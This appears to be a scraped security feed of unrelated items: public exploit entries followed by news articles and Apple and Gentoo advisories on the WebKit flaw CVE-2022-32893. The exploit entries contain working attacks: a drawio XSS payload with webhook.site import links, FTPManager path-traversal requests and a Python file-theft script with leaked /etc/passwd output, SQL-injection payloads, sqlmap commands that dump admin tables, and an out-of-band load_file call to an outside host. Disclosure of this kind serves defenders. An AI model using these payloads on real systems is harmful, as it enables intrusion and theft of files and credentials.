Cross-site Scripting (XSS) - Generic in GitHub repository jgraph/drawio prior to 20.3.0.

**Description**

The application allows the "use" tag to pass on dompurify, which leads to XSS. A strange behaviour bypasses the csp on app.diagrams.net when it has a "?" before the "#U" import.

**Proof of Concept**

POC diagram:

    <?xml version="1.0" encoding="UTF-8"?>
    <mxfile host="app.diagrams.netxyz" modified="2022-09-06T18:54:56.458Z" agent="5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" etag="xY3UKbpTp-KH--H4WcwT" version="20.2.8">
      <diagram id="4FUsL0c-RG27eG5O0xMg" name="Page-1">
        <mxGraphModel dx="1422" dy="664" grid="1" gridSize="10" guides="1" tooltips="1" connect="1" arrows="1" fold="1" page="1" pageScale="1" pageWidth="827" pageHeight="1169" math="0" shadow="0">
          <root>
            <mxCell id="0" />
            <mxCell id="1" parent="0" />
            <mxCell id="L7LsTOqxvLqq3sj4AYtF-1xyz" value="Text&lt;svg>&lt;use href=&#x22;data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoZG9jdW1lbnQuZG9tYWluKSIgLz4KPC9zdmc+#x&#x22; />&lt;/svg>" style="text;html=1;strokeColor=none;fillColor=none;align=center;verticalAlign=middle;whiteSpace=wrap;rounded=0;" vertex="1" parent="1">
              <mxGeometry x="430" y="260" width="60" height="30" as="geometry" />
            </mxCell>
          </root>
        </mxGraphModel>
      </diagram>
    </mxfile>
    

Raw payload:

    <svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoZG9jdW1lbnQuZG9tYWluKSIgLz4KPC9zdmc+#x" /></svg>
    

POC link

    https://app.diagrams.net/?#Uhttps://webhook.site/d38b94cb-a6ab-4219-b9f3-d34434b76341
    https://viewer.diagrams.net/index.html?#Uhttps://webhook.site/d38b94cb-a6ab-4219-b9f3-d34434b76341
    

**Impact**

XSS

**References**

*   https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#data-url-with-use-element-and-base64-encoded

CVE-2022-3148: XSS at app.diagrams.net in drawio

FTPManager version 8.2 suffers from local file inclusion and directory traversal vulnerabilities.

    # Exploit Title: FTPManager 8.2 Local File inclusion# Date: Sep 6, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186# Version: 8.2# Tested on: Ios 15.6GET /../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1Host: 192.168.1.178:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close------------------HTTP/1.1 200 OKConnection: CloseServer: GCDWebUploaderContent-Type: application/octet-streamLast-Modified: Wed, 13 Jul 2022 10:35:46 GMTDate: Tue, 06 Sep 2022 03:05:05 GMTContent-Length: 2581Cache-Control: max-age=3600, publicEtag: 1152921500312311384/1657708546/0### User Database## This file is the authoritative user database.##nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/falseroot:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/shmobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/shdaemon:*:1:1:System Services:/var/root:/usr/bin/false_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false_securityd:*:64:64:securityd:/var/empty:/usr/bin/false_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false_usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false_ondemand:*:249:249:On Demand ResourceDaemon:/var/db/ondemand:/usr/bin/false_findmydevice:*:254:254:Find My DeviceDaemon:/var/db/findmydevice:/usr/bin/false_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false_driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false_diskimagesiod:*:271:271:DiskImages IODaemon:/var/db/diskimagesiod:/usr/bin/false_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false_rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false_accessoryupdater:*:278:278:Accessory UpdateDaemon:/var/db/accessoryupdater:/usr/bin/false_knowledgegraphd:*:279:279:Knowledge GraphDaemon:/var/db/knowledgegraphd:/usr/bin/false_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false_sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false_trustd:*:282:282:trustd:/var/empty:/usr/bin/false_mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false_darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false_notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false---------------------------------------------------# Exploit Title: FTPManager 8.2 Directory Traversal (ftp)# Date: Sep 6, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186# Version: 8.2# Tested on: ios 15.6#ftp 192.168.1.178 2121Connected to 192.168.1.178.220 ---------- Welcome to FTPManager ----------Name (192.168.1.178:chokri):230 User chokri logged in.Remote system type is UNIX.Using binary mode to transfer files.ftp> cd /../../../../../../../../../../../../../../../../250 OK. Current directory is/../../../../../../../../../../../../../../../../ftp> ls200 PORT command successful.150 Accepted data connectiontotal 10drwxr-xr-x     0 root wheel        256 Jan 01 1970 usrdrwxr-xr-x     0 root wheel        128 Jan 01 1970 bindrwxr-xr-x     0 root wheel        576 Jan 01 1970 sbindrwxr-xr-x     0 root wheel        160 Jan 01 1970 Systemdrwxr-xr-x     0 root wheel        672 Jan 01 1970 Librarydrwxr-xr-x     0 root wheel        224 Jan 01 1970 privatedrwxr-xr-x     0 root wheel       1132 Jan 01 1970 devdrwxr-xr-x     0 root admin       3968 Jan 01 1970 Applicationsdrwxr-xr-x     0 root admin         64 Jan 01 1970 Developerdrwxr-xr-x     0 root admin         64 Jan 01 1970 coresWARNING! 10 bare linefeeds received in ASCII modeFile may not have transferred correctly.226 Transfer complete.ftp> cd private/etc250 OK. Current directory is/../../../../../../../../../../../../../../../../private/etcftp> get passwdlocal: passwd remote: passwd200 PORT command successful.150 Opening BINARY mode data connection for 'passwd'.226 Transfer complete.2581 bytes received in 0.00 secs (11.5020 MB/s)ftp> get serviceslocal: services remote: services200 PORT command successful.150 Opening BINARY mode data connection for 'services'.226 Transfer complete.677977 bytes received in 0.17 secs (3.8257 MB/s)---------------------------------------------------# Exploit Title: FTPManager 8.2 Local File inclusion (ftp) python# Date: Sep 6, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.skyjos.com/# Software Link:https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186# Version: 8.2# Tested on: ios 15.6from ftplib import FTPimport argparsehelp = " FTPManager 8.2 Local File inclusion by chokri hammedi"parser = argparse.ArgumentParser(description=help)parser.add_argument("--target", help="Target IP", required=True)parser.add_argument("--file", help="File To Open eg: etc/passwd")args = parser.parse_args()ip = args.targetport = 2121 # Default Portfiles = args.fileftpConnection = FTP()ftpConnection.connect(host=ip, port=port)ftpConnection.login();def downloadFile():ftpConnection.cwd('/../../../../../../../../../../../../../../../../')        ftpConnection.retrbinary(f"RETR {files}", open('data.txt','wb').write)        ftpConnection.close()        file = open('data.txt', 'r')        print (f"[***] The contents of {files}\n")        print (file.read())downloadFile()

FTPManager 8.2 Local File Inclusion / Directory Traversal

Wifi HD Wireless Disk Drive version 11 suffers from a local file inclusion vulnerability.

    # Exploit Title: Wifi HD Wireless Disk Drive Local File Inclusion# Date: Aug 13, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: http://www.savysoda.com# Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/id311170976# Version: 11# Tested on: iPhone OS 15_5GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1Host: 192.168.1.100Connection: closeUpgrade-Insecure-Requests: 1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5  Safari/604.1Referer: http://192.168.1.103/Accept-Language: en-GB,en-US;q=0.9,en;q=0.8Accept-Encoding: gzip, deflate-----------------HTTP/1.1 200 OKContent-Disposition: attachmentContent-Type: application/downloadContent-Length: 213Accept-Ranges: bytesDate: Sat, 13 Aug 2022 03:33:30 GMT### Host Database## localhost is used to configure the loopback interface# when the system is booting.  Do not change this entry.##127.0.0.1 localhost255.255.255.255 broadcasthost::1             localhost

Wifi HD Wireless Disk Drive 11 Local File Inclusion

A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file medicine_details.php. The manipulation of the argument medicine leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-207854 is the identifier assigned to this vulnerability.

**Clinic's Patient Management System - medicine\_details.php 'medicine' SQL inject****Exploit Title: Clinic's Patient Management System - medicine\_details.php 'medicine' SQL inject****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code****Software Link:https://www.sourcecodester.com/php-clinics-patient-management-system-source-code****Version: Loan Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description**

The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user's input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Clinic's Patient Management System does not filter the content correctly at the "medicine\_details.php /medicine" parameter, resulting in the generation of SQL injection.

**Payload used:**

    POST /medicine_details.php HTTP/1.1
    Host: 192.168.31.35:8089
    Content-Length: 79
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.31.35:8089
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.31.35:8089/medicine_details.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=lkdn1jvj1em9c4j3olu9e2pdpo
    Connection: close
    
    medicine=1 AND GTID_SUBSET(CONCAT(0,(SELECT user()),0),3619)&packing=11&submit=
    

**Proof of Concept**

1、After logging in, use the add medicine function to capture and analyze the traffic, and find that the program is in medicine\_details.php.

2、Looking at the source code, it is found that the password field is directly brought into the SQL statement query without filtering

3、During manual testing, it is found that SQL error reporting injection exists, so the sensitive information and permissions of the database can be obtained by using the error reporting

4、Through testing with the tool, it is found that there are other injection methods such as blind SQL time injection.

CVE-2022-3122: webray.com.cn/cpmssql.md at main · joinia/webray.com.cn

Online Food Ordering System v1.0 was discovered to contain a SQL injection vulnerability via the component /dishes.php?res_id=.

\# Online Food Ordering System Unauthenticated Sql Injection \* Exploit Date: 7/25/2022 \* Exploit Author: Leu Xuan Hieu # Exploit \* Injection Point => \`/dishes.php?res\_id=\` !\[\](https://i.imgur.com/qdPtouQ.jpg) \* Used Burp Suite capture request then save as \`food.txt\` \`\`\`python= python3 sqlmap.py -r food.txt -batch -current-db \`\`\` !\[\](https://i.imgur.com/kLRKlCD.png) \`\`\`python= python3 sqlmap.py -r food.txt -batch -D onlinefoodphp -tables \`\`\` !\[\](https://i.imgur.com/36uDA3J.png) \`\`\`python= python3 sqlmap.py -r food.txt -batch -columns -D onlinefoodphp -T admin -dump \`\`\` !\[\](https://i.imgur.com/J4SlcXJ.png) # POC \* Request \`\`\`python= GET /OnlineFood/dishes.php?res\_id=4'%2b(select%20load\_file('%5c%5c%5c%5c1ik2qvhgl8xqcydf43rujd4j6ac302otrhi48sx.oastify.com%5c%5cztc'))%2b' HTTP/1.1 Host: 192.168.1.101:8888 Cookie: PHPSESSID=311teftqpf9mla9pmac7o6sfq7 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.101:8888/OnlineFood/ Accept-Encoding: gzip, deflate Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Connection: close Cache-Control: max-age=0 \`\`\`

CVE-2022-36759: Online Food Ordering System Unauthenticated Sql Injection - HackMD

Categories: News
Tags: Apple

Tags:  iOS 12.5.6 

Tags:  webkit

Tags:  CVE-2022-32893

Apple has released a security update for iOS 12.5.6 to patch a remotely exploitable WebKit vulnerability that allows attackers to execute arbitrary code on unpatched devices.



(Read more...)




The post Apple releases security update for iPhones and iPads to address vulnerability appeared first on Malwarebytes Labs.

Apple has released a security update for iOS 12.5.6 to patch a remotely exploitable WebKit vulnerability that allows attackers to execute arbitrary code on unpatched devices.

The WebKit zero-day that is known as CVE-2022-32893 was fixed for iOS 15.6.1, iPadOS 15.6, and macOS Monterey 12.5.1 on August 17, and for Safari in macOS Big Sur and macOS Catalina on August 18. This update applies to older devices running iOS 12.

**Zero-day?**

Technically this is not a zero-day, because by definition a zero-day is a software vulnerability previously unknown to those who should be interested in fixing it, like the vendor of the target. And since this vulnerability has been known for weeks it is no longer considered a zero-day, although users of older Apple OS versions were unable to install a patch for this vulnerability until now.

**WebKit vulnerability**

CVE-2022-32893 is an out-of-bounds write issue that was addressed with improved bounds checking. Processing maliciously crafted web content may lead to arbitrary code execution. An attacker could lure a potential victim to a specially crafted website or use malvertising to compromise a vulnerable system by exploiting this vulnerability. The vulnerability exists in Apple’s HTML rendering software, WebKit, which powers all iOS web browsers and Safari, so possible targets are iPhones, iPads, and Macs which could all be tricked into running unauthorized code.

Apple has already said it's aware of a report that the issue may have been actively exploited.

**Not vulnerable**

Apple mentions in the security update for CVE-2022-32893 that iOS 12 is not impacted by CVE-2022-32894. As we mentioned in our blog about the two actively exploited zero-days it seems likely that these vulnerabilities were found in an active attack that chained the two vulnerabilities together. The attack could, for example, be done in the form of a watering hole or as part of an exploit kit. CVE-2022-32893 could be exploited for initial code to be run, and this code could be used to leverage CVE-2022-32894 to obtain kernel privileges. This does not mean the WebKit vulneraility can do no harm on devices that are not vulnerable to CVE-2022-32894, as it could be chained with another vulnerability to obtain higher privileges,

**Mitigation**

Other than the information that the exploit has been used in the wild, Apple has not released any specifics about the vulnerability. The vulnerabilities are on the CISA list of vulnerabilities to be patched by September 8.

Owners of an iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, or iPod touch (6th generation) can use the update function on the device or use iTunes to update the software to iOS 12.5.6.

Stay safe, everyone!

Apple releases security update for iPhones and iPads to address vulnerability

Apple Security Advisory 2022-08-31-1 - iOS 12.5.6 addresses code execution and out of bounds write vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-2022-08-31-1 iOS 12.5.6iOS 12.5.6 addresses the following issues.Information about the security content is also available athttps://support.apple.com/HT213428.iOS 12 is not impacted by CVE-2022-32894.WebKitAvailable for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPadmini 2, iPad mini 3, and iPod touch (6th generation)Impact: Processing maliciously crafted web content may lead toarbitrary code execution. Apple is aware of a report that this issuemay have been actively exploited.Description: An out-of-bounds write issue was addressed with improvedbounds checking.WebKit Bugzilla: 243557CVE-2022-32893: an anonymous researcherThis update is available through iTunes and Software Update on youriOS device, and will not appear in your computer's Software Updateapplication, or in the Apple Downloads site. Make sure you have anInternet connection and have installed the latest version of iTunesfrom https://www.apple.com/itunes/  iTunes and Software Update on thedevice will automatically check Apple's update server on its weeklyschedule. When an update is detected, it is downloaded and the optionto be installed is presented to the user when the iOS device isdocked. We recommend applying the update immediately if possible.Selecting Don't Install will present the option the next time youconnect your iOS device.  The automatic update process may take up toa week depending on the day that iTunes or the device checks forupdates. You may manually obtain the update via the Check for Updatesbutton within iTunes, or the Software Update on your device.  Tocheck that the iPhone, iPod touch, or iPad has been updated:  *Navigate to Settings * Select General * Select About. The versionafter applying this update will be "iOS 12.5.6".All information is also posted on the Apple Security Updatesweb site: https://support.apple.com/en-us/HT201222.This message is signed with Apple's Product Security PGP key,and details are available at:https://www.apple.com/support/security/pgp/-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmMPsMkACgkQ4RjMIDkeNxmXTQ//TeGVIwqrnMbCv1iIzp5NfxAMYv0pnALmXOkXFFEWLmowM3zGknGHYk5SHyMTDhpbMVEoNtyY/CKH71gZC08mt7p13Y08lbAphMZzbsSvsEjnxiKHE1cqaIp+Txv9kZXHo4C1xT2LSJtfxy9EgF6aqjD8nYgNUueE8vZUg7KIOYdnCPACcGuWOonGNkg4bsgGhMHuWay7Om6kjoyYv2AVDisfaF4lkFKD+c+5E1A2BYbz+OQt68XLqFT9LZJY8LvUTWuYC6dmaZ3VJKDmlu3fybWyn1EAL5tpYzgEwmR/ooRkRuDWI4muj+Mm+WfuQdF53RlKSB91Mw1djMJu2puhcNkVNjLKiz22XFqt3MXaYkAcx/Ih7Bvt9AjgGkH+asd7HvgODgiQNXq/PTz6+7JUx8XHlef+efBjIITNuAbTBO1bvdaojUQ8rd3QpWXIUoMht6YlzYETf/ZeyZOvltIIdHxFnplh7YBI4Alw11NFFXeUyynjSQc14/Q0ne1LT/JBNxaT0s8tudyRiqOZGn+xdgsDA63lWnOcuoqSCDEXlNhkJECFr492xzsApe93jpskXfMeAw8FNXhl8UrRav5TbxOhMz60lac6hO7KPodbKh2fiIYZairZrEJhWrAmWos4/sYLMQyafQSCkTs7sy2jNQxjMWPhoZhsXZTy/w/ty1g=/yG9-----END PGP SIGNATURE-----

Apple Security Advisory 2022-08-31-1

Gentoo Linux Security Advisory 202208-39 - Multiple vulnerabilities have been found in WebkitGTK+, the worst of which could result in the arbitrary execution of code. Versions less than 2.36.7 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202208-39- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High    Title: WebKitGTK+: Multiple Vulnerabilities     Date: August 31, 2022     Bugs: #866494, #864427, #856445, #861740, #837305, #845252, #839984, #833568, #832990       ID: 202208-39- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis=======Multiple vulnerabilities have been found in WebkitGTK+, the worst ofwhich could result in the arbitrary execution of code.Background=========WebKitGTK+ is a full-featured port of the WebKit rendering engine,suitable for projects requiring any kind of web integration, from hybridHTML/CSS applications to full-fledged web browsers.Affected packages================    -------------------------------------------------------------------     Package              /     Vulnerable     /            Unaffected    -------------------------------------------------------------------  1  net-libs/webkit-gtk        < 2.36.7                    >= 2.36.7Description==========Multiple vulnerabilities have been discovered in WebKitGTK+. Pleasereview the CVE identifiers referenced below for details.Impact=====Please review the referenced CVE identifiers for details.Workaround=========There is no known workaround at this time.Resolution=========All WebKitGTK+ users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.36.7"References=========[ 1 ] CVE-2022-2294      https://nvd.nist.gov/vuln/detail/CVE-2022-2294[ 2 ] CVE-2022-22589      https://nvd.nist.gov/vuln/detail/CVE-2022-22589[ 3 ] CVE-2022-22590      https://nvd.nist.gov/vuln/detail/CVE-2022-22590[ 4 ] CVE-2022-22592      https://nvd.nist.gov/vuln/detail/CVE-2022-22592[ 5 ] CVE-2022-22620      https://nvd.nist.gov/vuln/detail/CVE-2022-22620[ 6 ] CVE-2022-22624      https://nvd.nist.gov/vuln/detail/CVE-2022-22624[ 7 ] CVE-2022-22628      https://nvd.nist.gov/vuln/detail/CVE-2022-22628[ 8 ] CVE-2022-22629      https://nvd.nist.gov/vuln/detail/CVE-2022-22629[ 9 ] CVE-2022-22662      https://nvd.nist.gov/vuln/detail/CVE-2022-22662[ 10 ] CVE-2022-22677      https://nvd.nist.gov/vuln/detail/CVE-2022-22677[ 11 ] CVE-2022-26700      https://nvd.nist.gov/vuln/detail/CVE-2022-26700[ 12 ] CVE-2022-26709      https://nvd.nist.gov/vuln/detail/CVE-2022-26709[ 13 ] CVE-2022-26710      https://nvd.nist.gov/vuln/detail/CVE-2022-26710[ 14 ] CVE-2022-26716      https://nvd.nist.gov/vuln/detail/CVE-2022-26716[ 15 ] CVE-2022-26717      https://nvd.nist.gov/vuln/detail/CVE-2022-26717[ 16 ] CVE-2022-26719      https://nvd.nist.gov/vuln/detail/CVE-2022-26719[ 17 ] CVE-2022-30293      https://nvd.nist.gov/vuln/detail/CVE-2022-30293[ 18 ] CVE-2022-30294      https://nvd.nist.gov/vuln/detail/CVE-2022-30294[ 19 ] CVE-2022-32784      https://nvd.nist.gov/vuln/detail/CVE-2022-32784[ 20 ] CVE-2022-32792      https://nvd.nist.gov/vuln/detail/CVE-2022-32792[ 21 ] CVE-2022-32893      https://nvd.nist.gov/vuln/detail/CVE-2022-32893[ 22 ] WSA-2022-0002      https://webkitgtk.org/security/WSA-2022-0002.html[ 23 ] WSA-2022-0003      https://webkitgtk.org/security/WSA-2022-0003.html[ 24 ] WSA-2022-0007      https://webkitgtk.org/security/WSA-2022-0007.html[ 25 ] WSA-2022-0008      https://webkitgtk.org/security/WSA-2022-0008.htmlAvailability===========This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202208-39Concerns?========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License======Copyright 2022 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202208-39

Apple continues a staged update process to address a WebKit vulnerability that allows attackers to craft malicious Web content to load malware on affected devices.

Apple has quietly rolled out more updates to iOS to fix an actively exploited zero-day security vulnerability that it patched earlier this month in newer devices. The vulnerability, found in WebKit, can allow attackers to create malicious Web content that allows remote code execution (RCE) on a user's device.

An update released Wednesday, iOS 12.5.6, applies to the following models: iPhone 5S, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch 6th generation.

The flaw in question (CVE-2022-32893) is described by Apple as an out-of-bounds write issue in WebKit. It was addressed in the patch with improved bounds checking. Apple acknowledged that the bug is under active exploit, and is urging users of affected devices to update immediately.

Apple had already patched the vulnerability for some devices — alongside a kernel flaw tracked as CVE-2022-32894 — earlier in August in iOS 15.6.1. That's an update that covered iPhone 6S and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

The latest round of patches appears to be Apple covering all its bases by adding protection for iPhones running older versions of iOS, noted security evangelist Paul Ducklin.

"We're guessing that Apple must have come across at least some high-profile (or high-risk, or both) users of older phones who were compromised in this way, and decided to push out protection for everyone as a special precaution," he wrote in a post on the Sophos Naked Security blog.

The dual coverage by Apple to fix the bug in both versions of iOS is due to the change in which versions of the platform run on which iPhones, Ducklin explained.

Before Apple released iOS 13.1 and iPadOS 13.1, iPhones and iPads used the same operating system, referred to as iOS for both devices, he said. Now, iOS 12.x covers iPhone 6 and earlier devices, while iOS 13.1 and later versions run on iPhone 6s and devices released after.

The other zero-day flaw that Apple patched earlier this month, CVE-2022-32894, was a kernel vulnerability that can allow for entire device takeover. But while iOS 13 was affected by that flaw — and thus got a patch for it in the earlier update — it does not affect iOS 12, Ducklin observed, "which almost certainly avoids the risk of total compromise of the operating system itself" on older devices, he said.

**WebKit: A Wide Cyberattack Surface**

WebKit is the browser engine that powers Safari and all other third-party browsers that work on iOS. By exploiting CVE-2022-32893, a threat actor can build malicious content into a website. Then, if someone visits the site from an affected iPhone, the actor can remotely execute malware on his or her device.

WebKit in general has been a persistent thorn in Apple's side when it comes to exposing users to vulnerabilities because it spreads beyond iPhones and other Apple devices to other browsers that use it — including Firefox, Edge, and Chrome — putting potentially millions of users at risk from a given bug.

"Remember that WebKit bugs exist, loosely speaking, at the software layer below Safari, so that Apple's own Safari browser isn't the only app at risk from this vulnerability," Ducklin observed.

Moreover, any app that displays Web content on iOS for purposes other than general browsing — such as in its help pages, its _"About"_ screen, or even in a built-in "minibrowser" — uses WebKit under the hood, he added.

"In other words, just 'avoiding Safari' and sticking to a third-party browser is not a suitable workaround \[for WebKit bugs\]," Ducklin wrote.

**Apple Under Attack**

While users and professionals alike have traditionally considered Apple's Mac and iOS platforms as more secure than Microsoft Windows — and this has generally been true for a number of reasons — the tide is beginning to turn, experts say.

Indeed, an emerging threat landscape showing more interest in targeting more ubiquitous Web technologies and not the OS itself has widened the target on Apple's back, according to a threat report released in January, and the company's defensive patching strategy reflects this.

Apple has patched at least four zero-day flaws this year, with two patches for previous iOS and macOS vulnerabilities coming in January and one in February — the latter of which fixed another actively exploited issue in WebKit.

Moreover, last year 12 of 57 zero-day threats that researchers from Google's Project Zero tracked were Apple-related (i.e., more than 20%), with issues affecting macOS, iOS, iPadOS, and WebKit.

Apple Quietly Releases Another Patch for Zero-Day RCE Bug

Apple on Wednesday backported security updates to older iPhones, iPads, and iPod touch devices to address a critical security flaw that has been actively exploited in the wild.
The issue, tracked as CVE-2022-32893 (CVSS score: 8.8), is an out-of-bounds write issue affecting WebKit that could lead to arbitrary code execution when processing maliciously crafted web content.

The tech

Apple on Wednesday backported security updates to older iPhones, iPads, and iPod touch devices to address a critical security flaw that has been actively exploited in the wild.

The issue, tracked as **CVE-2022-32893** (CVSS score: 8.8), is an out-of-bounds write issue affecting WebKit that could lead to arbitrary code execution when processing maliciously crafted web content.

The tech giant said it fixed the bug with improved bounds checking. An anonymous researcher has been credited for reporting the vulnerability.

The iOS 12.5.6 update is available for iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation).

"iOS 12 is not impacted by CVE-2022-32894," Apple noted in its advisory.

The latest set of patches arrived weeks after the iPhone maker remediated the two flaws in iOS 15.6.1, iPadOS 15.6.1, macOS 12.5.1, and Safari 15.6.1 as part of updates shipped on August 18, 2022.

"Apple is aware of a report that this issue may have been actively exploited," it acknowledged in a boilerplate statement, although details regarding the nature of the attacks are unknown.

Users of older iOS devices are advised to apply the updates as soon as possible to mitigate potential threats.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#webkit